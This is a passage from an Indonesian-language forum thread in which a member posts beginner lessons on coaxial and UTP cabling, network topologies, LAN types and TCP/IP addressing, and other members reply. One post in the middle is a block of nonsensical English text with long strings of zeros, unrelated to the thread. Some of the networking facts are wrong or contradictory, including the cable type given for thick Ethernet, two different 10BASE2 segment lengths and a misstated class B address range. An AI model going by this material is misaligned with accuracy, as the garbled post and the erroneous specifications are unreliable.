Kabel coaxial jenis ini dispesifikasikan berdasarkan standar IEEE 802.3 10BASE5, dimana kabel
ini mempunyai diameter rata-rata 12mm, dan biasanya diberi warna kuning; kabel jenis ini biasa
disebut sebagai standard ethernet atau thick Ethernet, atau hanya disingkat ThickNet, atau bahkan
cuman disebut
sebagai yellow cable.

Kabel Coaxial ini (RG-6) jika digunakan dalam jaringan mempunyai spesifikasi dan aturan sebagai
berikut:
* Setiap ujung harus diterminasi dengan terminator 50-ohm (dianjurkan menggunakan terminator
yang sudah dirakit, bukan menggunakan satu buah resistor 50-ohm 1 watt, sebab resistor
mempunyai disipasi tegangan yang lumayan lebar, kalo gak ahli, bisa gawat nih).
* Maksimum 3 segment dengan peralatan terhubung (attached devices) atau berupa populated
segments.
* Setiap kartu jaringan mempunyai pemancar tambahan (external transceiver).
* Setiap segment maksimum berisi 100 perangkat jaringan, termasuk dalam hal ini repeaters.
* Maksimum panjang kabel per segment adalah 1.640 feet (atau sekitar 500 meter).
* Maksimum jarak antar segment adalah 4.920 feet (atau sekitar 1500 meter).
* Setiap segment harus diberi ground.
* Jarang maksimum antara tap atau pencabang dari kabel utama ke perangkat (device) adalah 16
feet(sekitar 5 meter).
* Jaral minimum antar tap adalah 8 feet (sekitar 2,5 meter).

2. Thin coaxial cable (Kabel Coaxial “Kurus”)


Kabel coaxial jenis ini banyak dipergunakan di kalangan radio amatir, terutama untuk transceiver
yang tidak memerlukan output daya yang besar. Untuk digunakan sebagai perangkat jaringan, kabel
coaxial jenis ini harus memenuhi standar IEEE 802.3 10BASE2, dimana diameter rata-rata berkisar
5mm dan
biasanya berwarna hitam atau warna gelap lainnya. Setiap perangkat (device) dihubungkan dengan
BNC T-connector. Kabel jenis ini juga dikenal sebagai thin Ethernet atau ThinNet.
Kabel coaxial jenis ini, misalnya jenis RG-58 A/U atau C/U, jika diimplementasikan dengan
TConnector dan terminator dalam sebuah jaringan, harus mengikuti aturan sebagai berikut:
* Setiap ujung kabel diberi terminator 50-ohm.
* Panjang maksimal kabel adalah 1,000 feet (185 meter) per segment.
* Setiap segment maksimum terkoneksi sebanyak 30 perangkat jaringan (devices)
* Kartu jaringan cukup menggunakan transceiver yang onboard, tidak perlu tambahan
transceiver,kecuali untuk repeater.
* Maksimum ada 3 segment terhubung satu sama lain (populated segment).
* Setiap segment sebaiknya dilengkapi dengan satu ground.
* Panjang minimum antar T-Connector adalah 1,5 feet (0.5 meter).
* Maksimum panjang kabel dalam satu segment adalah 1,818 feet (555 meter).
* Setiap segment maksimum mempunyai 30 perangkat terkoneksi.

demikian sekilas tentang kabel dan tipe2nya


masih banyak dan dalam kalo bicara tentang kabel sebenarnya, tapi berhubung tangan udah pegal,
dan leher udah kaku, kita sambung besok atau lusa ya

ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
dengan modal les bahasa inggris, hhe..
ntar kita akan ngebahas topologi jaringan yang merupakan "program kerja" dari kabel itu sendiri

semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-12-2006, 01:31 PM #3
jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

topologi jaringan
=================

masuk bab selanjutnya nih, hhe (sok jago)

penentuan topologi jaringan akan menentukan jenis kabel yang akan kita pake, dan juga sebaliknya,
ketersediaan kabel dan gocek yangkita punya, menjadi pikiran dong untuk membangun sebuah
jaringan (untuk kedepannya kita sebut network, biar keren)

sebenarnya sih banyak banget topologi network itu, tapi yang sering kita dengar itu cuma 3 doang,
dan yang banyak itu juga berbasis yang 3 ini, cuma kadang2 pelaku network memodifikasi sedikit
tergantung kondisi, misalkan areanya, panjang kabelnya, dll

siapa aja mereka bertiga itu:

1. ring topology
Topologi ini manfaatin kurva tertutup, artinya informasi dan data serta traffic disalurkan sedemikian
rupa sehingga ke masing-masing node. Umumnya fasilitas ini memanfaatkan fiber optic sebagai
sarananya
(walaupun ada juga yang menggunakan twisted pair).
(bahasannya ada di atas)

2. linear bus topology


Topologi linear bus merupakan topologi yang banyak dipergunakan pada masa penggunaan kabel
Coaxial menjamur. Dengan menggunakan T-Connector (dengan terminator 50ohm pada ujung
network), maka komputer atau perangkat jaringan lainnya bisa dengan mudah dihubungkan satu
sama lain.
Kesulitan utama dari penggunaan kabel coaxial adalah sulit untuk mengukur apakah kabel coaxial
yang dipergunakan benar-benar matching atau tidak. Karena kalau tidak bener-bener diukur secara
tepat akan merusak NIC (network interface card) yang dipergunakan dan kinerja jaringan menjadi
terhambat, tidak mencapai kemampuan maksimalnya. Topologi ini juga sering digunakan pada
jaringan dengan basis fiber optic (yang kemudian digabungkan dengan topologi star untuk
menghubungkan
dengan client atau node).

3. star topology
Topologi jaringan ini banyak digunakan di berbagai tempat, karena kemudahan untuk menambah,
mengurangi atau mendeteksi kerusakan jaringan yang ada. Selain itu, permasalahan panjang kabel
yang harus sesuai (matching) juga tidak menjadi suatu yang penting lagi. Pokoknya asal ada hub
(yang masih beres tentunya) maka bisa terhubunglah beberapa komputer dan sumber daya jaringan
secara mudah.
Dengan berbekal crimtool, kabel UTP (biasanya CAT5) dan connector, seseorang dengan mudah
membuat sebuah sistem jaringan. Tentu ada beberapa kerugian karena panjang kabel (loss effect)
maupun karena hukum konduksi, namun hampir bisa dikatakan semua itu bisa diabaikan.

Paparan ketiga topologi di atas hanya sebagai sebuah pengantar. Intinya bahwa sebuah jaringan bisa
jadi
merupakan kombinasi dari dua atau tiga topologi di atas. Misalnya saja ada yang menyebut tree
topology,
dimana sebenarnya topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada.

itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-12-2006, 01:41 PM #4
ihan_sunrise
Contributor
Join Date: Apr 2006
Location: Negeri Syariat
Posts: 2,210
Thanks: 0
Thanked 25 Times in 10 Posts

--------------------------------------------------------------------------------

up load gambar harus dari photobucket dulu lis.....setelah itu baru masukin kemari...kayaknya dulu
dah ad penjelasannya, cuman ihan lupa di thread apa
__________________
cinta telah merengkuh ku
dan aku lega bisa memeluknya
rindu telah menarik ku
dan aku senang karena ia tak membiar kan ku

Ihan Sunrise
http://ihansunrise.blogspot.com/

ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise

hurried step towards the table


12-12-2006, 05:09 PM #5

bedroom living room in the house ahmadi iksan haris


nuk wulan tito wanted to take his glasses like a child
1000000000000000000000000000000000000000000
000000000000000000 forces continue to follow the
great iskandar farid wulan ahmadi extraordinary
spectacles to take children Darmo
10000000000000000000000000000000000000 darmi
troops followed them Hurip adenan Mulyani would
like to take glasses isang wanted to take his glasses to
take the plate with a colorful married servants who
worked as a cook clean sweep of the room with
colorful married anywhere agus married with colors
like to take glasses lilik want to take the glasses to
take glasses Nunus andi mas tito Theresa wanted to
take a child glasses follow
1000000000000000000000000000000000
extraordinary iskandar memngambil also wanted
glasses so in the closet to retrieve his glasses mufti of
children and law mufti who wanted to take the glasses
to a law that opened the closet darmi
100000000000000000000000000000000000 Darmo
children eat and drink with the following colors
baiquni
Peutua

Join Date: Mar 2006


Location: banda aceh
Posts: 571
Thanks: 0
Thanked 10 Times in 5 Posts

--------------------------------------------------------------------------------

makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.

Alis... gi ngapain ?
__________________
Satu hati... Satu rasa... SEMESTINYA !!!

My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/

baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni

12-15-2006, 12:58 PM #6
jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by baiquni
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.

Alis... gi ngapain ?

amin...alis kira gak ada yang respon, hhe..


ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-15-2006, 01:32 PM #7
sHinOsuke
Super Moderator

Join Date: Feb 2006


Posts: 1,363
Thanks: 16
Thanked 47 Times in 14 Posts
--------------------------------------------------------------------------------

eh kalau mau buat WLAN apa-apa aja ya perangkat yang di butuhkan


__________________
Fadli Blogs Free MySQL Database Article

sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke

12-15-2006, 03:33 PM #8
aloysurf
TUKANG FOTO

Join Date: Nov 2006


Location: On The Beach
Posts: 1,942
Thanks: 8
Thanked 4 Times in 4 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?

Coba lihat di sini http://acehforum.or.id/showthread.php?t=2740


Semoga berkenan...

Salam

aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf

12-17-2006, 11:22 AM #9
muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
amin...alis kira gak ada yang respon, hhe..
ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi

ow..mantap bang lagi sibuk TA malah sempat bagi2 ilmu mantap..oya untuk cara pasang kabel utp
nya ditambah dikit donk bang,,,biar mantap...sekalian cara buat pc router...dalam bahasa indonesia
ya bang...sep...mantap buat bang alis..

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-18-2006, 05:29 AM #10


acheh
Geuchik

Join Date: Feb 2006


Location: Bumi Allah
Posts: 996
Thanks: 31
Thanked 14 Times in 4 Posts

--------------------------------------------------------------------------------

ini thread makin sip klo disertai dengan gambarnya ..


misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...

acheh
View Public Profile
Send a private message to acheh
Find More Posts by acheh

12-18-2006, 09:24 AM #11


jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe

@muiz
pc router dan masang UTP ya...
besok kita sambung ya...

@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..

sambung nyak....

kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN

seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).

Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.

Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.

Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh

secara garis besar, LAN itu didukung 2 komponen utama, yaitu:


1. Kompenen fisik seperti PC, NIC (Network Interface Card), kabel dan topologinya
2. Kompenen Software seperti sistem operasi, Network Adapter Driver dan protokol jaringan itu
sendiri

apaan sih tu lis?


mari kita bahas aja satu2..

PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut

NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..

kabel dan topologi jaringan


coba lihat aja postingan sebelumnya

NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.

sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...

1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.

Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.

Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
2. Jaringan Peer To Peer
--------------------------
Bila ditinjau dari peran server di kedua tipe jaringan tersebut, maka server di jaringan tipe peer to
peer diistilahkan non-dedicated server, karena server tidak berperan sebagai server murni melainkan
sekaligus dapat berperan sebagai workstation. (lha?)

Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.

Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.

(capek euy, mending copy aja ya?)

nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..

("_")
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-18-2006, 07:28 PM #12


muiz
Peutua
Join Date: Dec 2006
Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by acheh
ini thread makin sip klo disertai dengan gambarnya ..
misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...

yup..pake gambar lebih jelas..tambah rame n bergairah belajarnya.. makasi...

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-18-2006, 07:56 PM #13


muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

sep bang alis

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-20-2006, 11:33 AM #14


jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

cara masang kabel UTP

--------------------------------------------------------------------------------

---------------------

jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:

1. Standard T568-A

Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat

2. Standard T568-B

Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat

2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:

Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.

Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai adalah
standard T568-B.

Crossover
===========
Merupakan jenis kabel yang digunakan untuk menghubungkan antar workstation atau antar
hub/switch. Kabel jenis ini menggunakan standard T568-A pada salah satu ujung, dan T568-B pada
ujung lainnya.

ini ada dikit cara masangnya:

1. Pembuatan kabel
a) Siapkan kabel UTP dan RJ 45 sebagai interfacenya
b) Potong jaket ujung kabel kira-kira 1.5 cm dengan cutter atau gunting,dan buanglah jaket tersebut.
Hati-hati dalam mengupas jaket, jangan sampai kabel yang ada di dalamnya ikut terpotong.
c) Untwist atau buka lilitan masing-masing pasangan kabel
d) Untuk membuat kabel straight-trough, crossover maupun rollover, lihat standard T568-A atau
T568-B
e) Sesuaikan masing-masing jenis kabel dengan standardnya, lalu luruskan hingga memungkinkan
untuk bisa dimasukkan ke dalam RJ 45
f) Bila sudah dimasukkan ke RJ 45, crimpinglah dengan menggunakan peralatan yang ada agar
kabel menjadi permanen dan tidak mudah goyah
g) Periksa terlebih dahulu urutan kabelnya sebelum dicrimping, karena kabel yang sudah
dicrimping tidak dapat dicabut lagi. Artinya jika kita salah mengurutkan pasangan atau
memasukkan ke RJ 45 nya kurang sempurna, besar kemungkinan kabel tidak dapat dipakai

2. Test kabel
a) Kabel yang sudah dicrimping dapat dideteksi kesalahannya dengan memakai cable tester (misal :
Fluke 620 LSN CableMeter)
b) Bila cable tester tidak ada, pasangkan kabel tersebut dari NIC ke hub (bila jenisnya straight-
through) dan antar workstation jika jenis kabelnya adalah crossover.
c) Pekailah perintah ping untuk uji coba kabel. Apabila koneksi dapat terbentuk, berarti pembuatan
kabel Anda sudah benar. Sebaliknya, jika koneksi tak dapat terbentuk, berarti ada kesalahan dalam
proses cabling.

semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-20-2006, 11:37 AM #15


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

Protokol TCP/IP
===============
Karena penting peranannya pada sistem operasi Windows dan juga karena protokol TCP/IP
merupakan protokol pilihan (default) dari Windows. Protokol TCP berada pada lapisan Transport
model OSI (Open System Interconnection), sedangkan IP berada pada lapisan Network mode OSI

IP Address
----------
IP address adalah alamat yang diberikan pada jaringan komputer dan peralatan jaringan yang
menggunakan protokol TCP/IP. IP address terdiri atas 32 bit angka biner yang dapat dituliskan
sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik seperti 192.168.0.1.

+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+

IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID menentukan
alamat jaringan komputer, sedangkan host ID menentukan alamat host (komputer, router, switch).

Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana
host itu berada.

Kelas-kelas IP Address
------------------------
Untuk mempermudah pemakaian, bergantung pada kebutuhan pemakai, IP address dibagi dalam
tiga kelas seperti diperlihatkan dibawah

------+------------+---------------+--------------------+
Kelas |Network ID Host ID | Default Subnet Mask|
------+-------------+---------------+--------------------+
A |xxx.0.0.1 |xxx.255.255.254| 255.0.0.0 |
B |xxx.xxx.0.1 |xxx.xxx.255.254| 255.255.0.0 |
C |xxx.xxx.xxx.1|xxx.xxx.xxx.254| 255.255.255.0 |
------+-------------+---------------+--------------------+

IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar.
Range IP 1.xxx.xxx.xxx. – 126.xxx.xxx.xxx, terdapat 16.777.214 (16 juta) IP address pada tiap
kelas A.
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Pada IP address
kelas A, network ID ialah 8 bit pertama, sedangkan host ID ialah 24 bit berikutnya.
Dengan demikian, cara membaca IP address kelas A, misalnya 113.46.5.6 ialah:
Network ID = 113
Host ID = 46.5.6
Sehingga IP address diatas berarti host nomor 46.5.6 pada network nomor 113.

IP address kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Pada IP
address kelas B, network ID ialah 16 bit pertama, sedangkan host ID ialah 16 bit berikutnya.
Dengan demikian, cara membaca IP address kelas B, misalnya 132.92.121.1
Network ID = 132.92
Host ID = 121.1
Sehingga IP address di atas berarti host nomor 121.1 pada network nomor 132.92. dengan panjang
host ID 16 bit, network dengan IP address kelas B dapat menampung sekitar 65000 host. Range IP
128.0.xxx.xxx – 191.155.xxx.xxx

IP address kelas C awalnya digunakan untuk jaringan berukuran kecil (LAN). Host ID ialah 8 bit
terakhir. Dengan konfigurasi ini, bisa dibentuk sekitar 2 juta network dengan masing-masing
network memiliki 256 IP address. Range IP 192.0.0.xxx – 223.255.255.x.
Pengalokasian IP address pada dasarnya ialah proses memilih network Id dan host ID yang tepat
untuk suatu jaringan. Tepat atau tidaknya konfigurasi ini tergantung dari tujuan yang hendak
dicapai, yaitu mengalokasikan IP address seefisien mungkin.

Domain Name System (DNS)


-------------------------
Domain Name System (DNS) adalah suatu sistem yang memungkinkan nama suatu host pada
jaringan komputer atau internet ditranslasikan menjadi IP address. Dalam pemberian nama, DNS
menggunakan arsitektur hierarki.

1. Root-level domain: merupakan tingkat teratas yang ditampilkan sebagai tanda titik (.).
2. Top level domain: kode kategori organisasi atau negara misalnya: .com untuk dipakai oleh
perusahaan; .edu untuk dipakai oleh perguruan tinggi; .gov untuk dipakai oleh badan pemerintahan.
Selain itu untuk membedakan pemakaian nama oleh suatu negara dengan
negara lain digunakan tanda misalnya .id untuk Indonesia atau .au untuk australia.
3. Second level domain: merupakan nama untuk organisasi atau perusahaan, misalnya:
microsoft.com; yahoo.com, dan lain-lain.

DHCP (Dynamic Host Configuration Protocol)


-------------------------------------------
IP address dan subnet mask dapat diberikan secara otomatis menggunakan Dynamic Host
Configuration Protocol atau disi secara manual.
DHCP berfungsi untuk memberikan IP address secara otomatis pada komputer yang menggunakan
protokol TCP/IP. DHCP bekerja dengan relasi client-server, dimana DHCP server menyediakan
suatu kelompok IP address yang dapat diberikan pada DHCP client. Dalam memberikan IP address
ini, DHCP hanya meminjamkan IP address tersebut. Jadi pemberian IP address ini berlangsung
secara dinamis.

Topologi Jaringan adalah gambaran secara fisik dari pola hubungan antara komponen-komponen
jaringan, yang meliputi server, workstation, hub dan pengkabelannnya. Terdapat tiga macam
topologi jaringan umum digunakan, yaitu Bus, Star dan Ring.
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-20-2006, 11:38 AM #16


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

untuk wlan .....


apa ya yang dibutuhin?
kalo alis gak salah sih cuma butuh access point aja.
kalo mau dari laptop kan udah ada tuh wireless linknya, tinggal konfigurasi aja di laptopnya, kalo di
kompi biasa, beli dulu access pointnya untuk nangkap gelombangnya, untuk seterusnya,
sambungkan access point ke komputer dengan kabel LAN biasa...dari AP ke Kompi mesti pake
kabel, karena Kompi gak punya wirelesslink seperti laptop..itu yang alis tau...mungkin ada teman2
yang lebih tau..hhe
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-22-2006, 07:43 PM #17


c4m4r2006
kawoem

Join Date: Apr 2006


Location: Jakarta
Posts: 166
Thanks: 0
Thanked 14 Times in 7 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe

@muiz
pc router dan masang UTP ya...
besok kita sambung ya...

@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..

sambung nyak....

kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN

seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).

Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.

Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.

Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh

secara garis besar, LAN itu didukung 2 komponen utama, yaitu:


1. Kompenen fisik seperti PC, NIC (Network Interface Card), kabel dan topologinya
2. Kompenen Software seperti sistem operasi, Network Adapter Driver dan protokol jaringan itu
sendiri

apaan sih tu lis?


mari kita bahas aja satu2..

PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut

NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..

kabel dan topologi jaringan


coba lihat aja postingan sebelumnya

NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.

sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...

1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.

Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
